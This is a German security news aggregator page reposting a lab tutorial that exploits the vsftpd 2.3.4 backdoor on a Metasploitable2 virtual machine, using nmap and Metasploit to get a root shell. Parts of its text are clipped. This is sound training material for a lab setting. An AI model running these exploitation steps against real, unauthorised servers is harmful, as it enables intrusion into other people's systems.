🕵️ SicherheitslückenWhat continuous operational resilience looks like under DORA(09.09.2026 um 17:53 Uhr)
🔧 AI Nachrichten OpenAI seeks tougher AI rules. CIOs may feel the ripple effects(10.09.2026 um 12:11 Uhr)
🔧 AI Nachrichten Mistral valued at €21bn after €3bn Series D funding round(08.09.2026 um 10:19 Uhr)
🪟 Windows TippsWindows XP's Cursor Indicator Is Getting a Windows 11 Refresh(25.08.2026 um 13:00 Uhr)
🕵️ SicherheitslückenWhat continuous operational resilience looks like under DORA(09.09.2026 um 17:53 Uhr)
🔧 AI Nachrichten OpenAI seeks tougher AI rules. CIOs may feel the ripple effects(10.09.2026 um 12:11 Uhr)
🔧 AI Nachrichten Mistral valued at €21bn after €3bn Series D funding round(08.09.2026 um 10:19 Uhr)
🪟 Windows TippsWindows XP's Cursor Indicator Is Getting a Windows 11 Refresh(25.08.2026 um 13:00 Uhr)

🔧 Programmierung 🕛 vor 1 Jahr 4 Min Lesezeit SECURITY-FEED
0

Ethical Hacking | FTP Vulnerability Exploitation

↗ Quelle (dev.to)
🔬 IoC Intelligence (1 Indikatoren erkannt)
192[.]168[.]122[.]102
🗣️ Stimme:
📑 Inhaltsübersicht




Introduction



, you will learn how to exploit vulnerabilities in the File Transfer Protocol (FTP) service to gain unauthorized access to a target machine. The scenario is set in a cybersecurity context, where you will assume the role of an ethical hacker tasked with identifying and exploiting vulnerabilities in a vulnerable FTP server.



The objective of environment, which consists of two virtual machines: the Kali Linux machine as the attacker, and the Metasploitable2 machine as the target.




  1. Start the Metasploitable2 virtual machine by running the following command in the terminal:




CODE
sudo virsh start Metasploitable2







  1. Verify that the Metasploitable2 machine is running by pinging it:




CODE
ping 192.168.122.102






Press Ctrl+C to stop the ping.




  1. Launch the Kali Linux container and enter its bash shell:




CODE
docker run -ti --network host b5b709a49cd5 bash







  1. Test the network connectivity between the Kali Linux container and the Metasploitable2 machine:




CODE
ping 192.168.122.102






Press Ctrl+C to stop the ping.



Now both the attack machine and the target machine are running, and you can start the penetration testing.



Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.






Perform Port Scanning



In this step, you will use the Nmap scanning tool to identify open ports and services running on the Metasploitable2 target machine.




  1. Start the PostgreSQL database service, which is required by Metasploit:




CODE
service postgresql start







  1. Initialize the Metasploit database:




CODE
msfdb init







  1. Launch the Metasploit Framework console:




CODE
cd ~
msfconsole







  1. Use Nmap to scan the target machine and identify open ports:




CODE
nmap -sV -T4 192.168.122.102






The -sV option enables version detection for open ports, and -T4 sets the timing policy for faster scanning.



Press Ctrl+D to quit the Metasploit console then start the inspection






Exploit the FTP Service Vulnerability



In this step, you will leverage the identified FTP service vulnerability to gain unauthorized access to the Metasploitable2 target machine.




  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:




CODE
cd ~
msfconsole







  1. Search for an FTP scanner module in Metasploit:




CODE
search scanner/ftp







  1. Use the ftp_version module to scan the FTP service:




CODE
use auxiliary/scanner/ftp/ftp_version







  1. Set the target host for the scan:




CODE
set RHOSTS 192.168.122.102







  1. Run the FTP version scan:




CODE
exploit







  1. Based on the FTP version identified, search for a corresponding exploitation module:




CODE
search vsFTPd







  1. Use the vsftpd_234_backdoor module to exploit the vulnerability:




CODE
use exploit/unix/ftp/vsftpd_234_backdoor







  1. Set the target host for the exploitation:




CODE
set RHOST 192.168.122.102







  1. Execute the exploitation:




CODE
exploit






Press Ctrl+D to quit the Metasploit console then start the inspection






Verify the Successful Exploitation



In this step, you will verify that the exploitation was successful and you have gained root access to the Metasploitable2 target machine.




  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:




CODE
cd ~
msfconsole







  1. Check the current user:




CODE
whoami







  1. Check the hostname of the compromised machine:




CODE
hostname







  1. Check the IP address of the compromised machine:




CODE
ifconfig






Press Ctrl+D to quit the Metasploit console then start the inspection






Summary



In










Want to Learn More?




  • 🌳 Learn the latest

  • 💬 Join our

Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf dev.to.
↗ Original-Artikel auf dev.to lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:
Community Threat-Level Barometer
Live Votum

Wie stufst du das Risiko dieser Schwachstelle / Bedrohung für dein Unternehmen ein?

Noch keine Stimmen — schätze das Risiko als Erster ein.

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
1 Quelle
Sam Altman calls GPT-6 Astra rollout ‘messy’ as enterprise users wait for access
1 Quelle
Swiss government explores replacing Microsoft 365 with open-source software
1 Quelle
What continuous operational resilience looks like under DORA
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten Ethical Hacking | FTP Vulnerability Exploitation

Thematisch verwandte Begriffe: Ethical, Hacking, Vulnerability, Exploitation · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...